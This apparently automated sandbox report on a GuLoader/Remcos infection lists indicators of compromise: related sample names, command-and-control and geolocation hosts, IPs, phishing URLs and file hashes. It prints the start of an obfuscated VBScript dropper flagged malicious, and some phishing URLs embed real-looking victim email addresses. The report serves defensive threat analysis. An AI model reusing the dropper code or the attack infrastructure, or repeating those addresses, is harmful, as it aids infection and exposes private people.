                                                          pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                              korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                doc_pl_invoice_awb_988-02403026_062024_00000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  178.237.33.50172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  erthings.docGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  girlfrnd.docGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  iwarsut775laudrye2.duckdns.orggirlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  waybill_shipping_documents_original_BL_CI&PL_01_07_2024_00000000_doc.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.228
                                                                  awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  bg.microsoft.map.fastly.nethttp://desistarsgilrsfunclub.blogspot.comGet hashmaliciousUnknownBrowse
                                                                  • 199.232.210.172
                                                                  https://forms.office.com/Pages/ResponsePage.aspx?id=5zeTpSSOnESEyA4i-4IXTVkGRSbFKXlDuHiMlnKZ76JUQ1hPQlpTWDE5NVBFVDNDOEpTWUUzRzJINi4u&c=E,1,Vc7Md6AAMwpyYv3orrPMFipOGeRWDexOMp5cXEAjnUdu4yXoid1-u_gwYrQfMQF58wVmL9VsyQWcmhvCkyBaAEtlxyL7nIjyE8Z8PN5Gtp6S7Fqm75iJrvkRzN-U&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                  • 199.232.214.172
                                                                  girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 199.232.214.172
                                                                  https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html#asa@aan.ptGet hashmaliciousUnknownBrowse
                                                                  • 199.232.210.172
                                                                  One_Docx 1.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                  • 199.232.214.172
                                                                  https://click.pstmrk.it/3s/www.rxeffect.com/xrJC/8OO2AQ/AQ/7b025ed7-37dd-46f9-8a3c-79d484929f8e/1/x7UnC8G8B9Get hashmaliciousUnknownBrowse
                                                                  • 199.232.214.172
                                                                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 199.232.214.172
                                                                  https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9kLnNhdXRpZXJAc2JtLm1jGet hashmaliciousHTMLPhisherBrowse
                                                                  • 199.232.210.172
                                                                  https://forms.office.com/r/xULzprLcwHGet hashmaliciousUnknownBrowse
                                                                  • 199.232.214.172
                                                                  29246162652093218035.jsGet hashmaliciousStrela DownloaderBrowse
                                                                  • 199.232.210.172
                                                                  asociatiatraditiimaria.rogirlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 93.113.54.56
                                                                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 93.113.54.56
                                                                  dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                                                  • 93.113.54.56
                                                                  dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                                                  • 93.113.54.56
                                                                  geoplugin.net1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 178.237.33.50
                                                                  erthings.docGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  girlfrnd.docGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 178.237.33.50
                                                                  Payment Advice__HSBC Banking.pdf.lnkGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  GTSCEGTSCentralEuropeAntelGermanyCZgirlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 93.113.54.56
                                                                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 93.113.54.56
                                                                  LisectAVT_2403002A_35.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                  • 185.146.87.128
                                                                  sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 195.56.40.173
                                                                  RiI7W2cj7p.elfGet hashmaliciousUnknownBrowse
                                                                  • 213.29.127.166
                                                                  https://liceultehnologicrosiajiu.ro/ulin/ulin8ce.htmlGet hashmaliciousCVE-2024-21412Browse
                                                                  • 85.9.47.248
                                                                  KBNCt45Gpk.elfGet hashmaliciousMiraiBrowse
                                                                  • 212.203.170.235
                                                                  5xUAAMwlnJ.elfGet hashmaliciousUnknownBrowse
                                                                  • 193.86.218.248
                                                                  COMANDA_AXM_NR17_DIN_240717.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                  • 185.146.87.128
                                                                  92.249.48.47-skid.ppc-2024-07-20T09_04_20.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 217.153.110.218
                                                                  ATGS-MMD-ASUSgirlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 34.166.62.190
                                                                  https://forms.office.com/Pages/ResponsePage.aspx?id=F0il39lMqEiGOt9WRpZx4wvO-e767m5Jgq527TAyuTxUNFdESUY2VVdIOU5UTDkxN01BVUg0V1dIWi4uGet hashmaliciousUnknownBrowse
                                                                  • 34.135.178.72
                                                                  file.exeGet hashmaliciousBabadedaBrowse
                                                                  • 34.149.100.209
                                                                  6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                  • 34.160.144.191
                                                                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 34.166.62.190
                                                                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                  • 34.149.100.209
                                                                  file.exeGet hashmaliciousBabadedaBrowse
                                                                  • 34.149.100.209
                                                                  file.exeGet hashmaliciousBabadedaBrowse
                                                                  • 34.149.100.209
                                                                  zKXXNr7f2e.exeGet hashmaliciousBabadedaBrowse
                                                                  • 34.149.100.209
                                                                  JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                                  • 34.160.144.191
                                                                  THORDC-ASISgirlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  waybill_shipping_documents_original_BL_CI&PL_01_07_2024_00000000_doc.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.228
                                                                  awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 192.253.251.227
                                                                  ATOM86-ASATOM86NL172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 178.237.33.50
                                                                  erthings.docGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  girlfrnd.docGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 178.237.33.50
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.MalwareX-gen.31904.27419.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 34.166.62.190
                                                                  • 93.113.54.56
                                                                  https://fiffr-12d16.web.appGet hashmaliciousUnknownBrowse
                                                                  • 34.166.62.190
                                                                  • 93.113.54.56
                                                                  Swift Copy.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 34.166.62.190
                                                                  • 93.113.54.56
                                                                  https://pendingdelivery864.s3.us-east.cloud-object-storage.appdomain.cloud/%2540%2523%2524%2525%255E%2526%2526()(%2526%2526%255E%255E%2525%2525%2524%2524%2524%2523%2523.html#nogueira@carboclor.com.arGet hashmaliciousUnknownBrowse
                                                                  • 34.166.62.190
                                                                  • 93.113.54.56
                                                                  6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                  • 34.166.62.190
                                                                  • 93.113.54.56
                                                                  Payment Advice__HSBC Banking.pdf.lnkGet hashmaliciousRemcosBrowse
                                                                  • 34.166.62.190
                                                                  • 93.113.54.56
                                                                  https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20=Get hashmaliciousPhisherBrowse
                                                                  • 34.166.62.190
                                                                  • 93.113.54.56
                                                                  http://cursostop10.com.br/adm/rudd/?email=nathalie.petillon@chirec.beGet hashmaliciousHTMLPhisherBrowse
                                                                  • 34.166.62.190
                                                                  • 93.113.54.56
                                                                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                  • 34.166.62.190
                                                                  • 93.113.54.56
                                                                  SecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 34.166.62.190
                                                                  • 93.113.54.56
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):71954
                                                                  Entropy (8bit):7.996617769952133
                                                                  Encrypted:true
                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):328
                                                                  Entropy (8bit):3.238004231589766
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKO9T9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:WqDImsLNkPlE99SNxAhUe/3
                                                                  MD5:B3BE7BD836EFCC5543BBA179248BED2F
                                                                  SHA1:C83808BBF376BC564DE647E9242B4BDF25096C16
                                                                  SHA-256:1C730851E716720EED5730C2A449BEB54189E3F6A8AFB5215E23714091AD66BD
                                                                  SHA-512:333F99D100D66F5DB8A95B5A6729032E66FBD3E602DE4D32F4C3BF72C0837A303DA3BB25B0877098A2C43CC6E588BE5FF6BE4EF8C4879469579735665C3F7494
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:p...... ........E;JLb...(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                  Process:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):962
                                                                  Entropy (8bit):5.013130376969173
                                                                  Encrypted:false
                                                                  SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                  MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                                                  SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                                                  SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                                                  SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8003
                                                                  Entropy (8bit):4.840877972214509
                                                                  Encrypted:false
                                                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                  MD5:106D01F562D751E62B702803895E93E0
                                                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                  Process:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                  File Type:ASCII text, with very long lines (2168), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26892
                                                                  Entropy (8bit):5.629815532396056
                                                                  Encrypted:false
                                                                  SSDEEP:768:HzSR022X/523S0e8xPPmp2TkLqur5pjMpc4i:TSuce8xPP2qur5+bi
                                                                  MD5:7A6E4C385A470B962384797F26BC0B8A
                                                                  SHA1:5D4EEEEF8961F0CA7A83B5BAEB36BB6715D61A11
                                                                  SHA-256:B13926E222564A63A3308DE6CB116C226E93CD1E9D1B5F2FCAC2DE6D80E70206
                                                                  SHA-512:BA326CBBA71BBFD6054A1F3564FCF4C085ADD37C186170E039E9CF469CDD16B0FD394F028D4D09EA45FAADEEA4CF5F4EDB64F8C5DB58EB67ED93987740D8E453
                                                                  Malicious:true
                                                                  Preview:Function Hazardless....Call Terminologers183.ShellExecute("P" & Essens, forsaales, "", "", Swizzled221)....End Function ....Spetrevlemundstetiser = String(236,"M") ....Rvertogterne = 61512..Supranaturalistic = &H617B..decreers = -54055..dermophobe = "Arkadens wienervalsenes smirkier fitzwater!"..Milieuvrns = &HFFFFB202..Fribilletternes = &HA946..Misrepresentation = 37891..Centralasiens = 4497..Unhasped = &HF896..Dommerstanden = "Trbeskyttelsen udgangene0, gtevir, afvbnede"..Hastemde = 34426..Fuppen = "Ters247 catholical152? turbomotorerne"..Actiniomorpha = "Kontrabogen netvrksadressernes; topvinklen215 stetikkers"..Slumstormer = &HFFFF6B6A..Solennitetssalen150 = 17979..Torskelevers = &H615D..Topstillingen = "Firspring tabulerer"..redigere = "Undiscerningness sprezzatura overdesirous strikkepindes"..Besttes = &H79DF..macroscopical = &H4D24..Hjlpetekstens = &H7376..Controversialism = "Sambars capitulum unfallen gnomists"..Humbug = 19967..Mongrels = -48175..unhelped = "Fortjningen widdies
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                  File Type:Extensible storage user DataBase, version 0x620, checksum 0x4061f958, page size 32768, DirtyShutdown, Windows version 10.0
                                                                  Category:dropped
                                                                  Size (bytes):17301504
                                                                  Entropy (8bit):1.023682830437214
                                                                  Encrypted:false
                                                                  SSDEEP:6144:bvQjYV7AyUO+xBGA611GJxBGA611Gv0M6JKX3XX35X3khTAvhTA/hTATX3t8nqkZ:UyUt3F0TkT0TAitKxK9Jd4T4Ago
                                                                  MD5:0E694DC9F7866D9901E95A4D3FCCA7C2
                                                                  SHA1:3959CAD861A337351A15E0431D01ABCF464D0926
                                                                  SHA-256:D8C923A4303DCAC61808E9E3A262E15F1D3B04BFE25DCEE2BF1B43460AF98BD8
                                                                  SHA-512:69F3D36D8F295CB787502416D88C24129B550D19E3C8CA99A89D0ABEC150637E24FD7DD21F1E5BDD15AC16F5CCAA6C2F7AB6EE4F714712A7D56D481CBC2B4CB2
                                                                  Malicious:false
                                                                  Preview:@a.X... .......4.........gN;....{........................&....../...{o.;....|..h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{....................................@.;....|...................xB.;....|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2
                                                                  Entropy (8bit):1.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:Qn:Qn
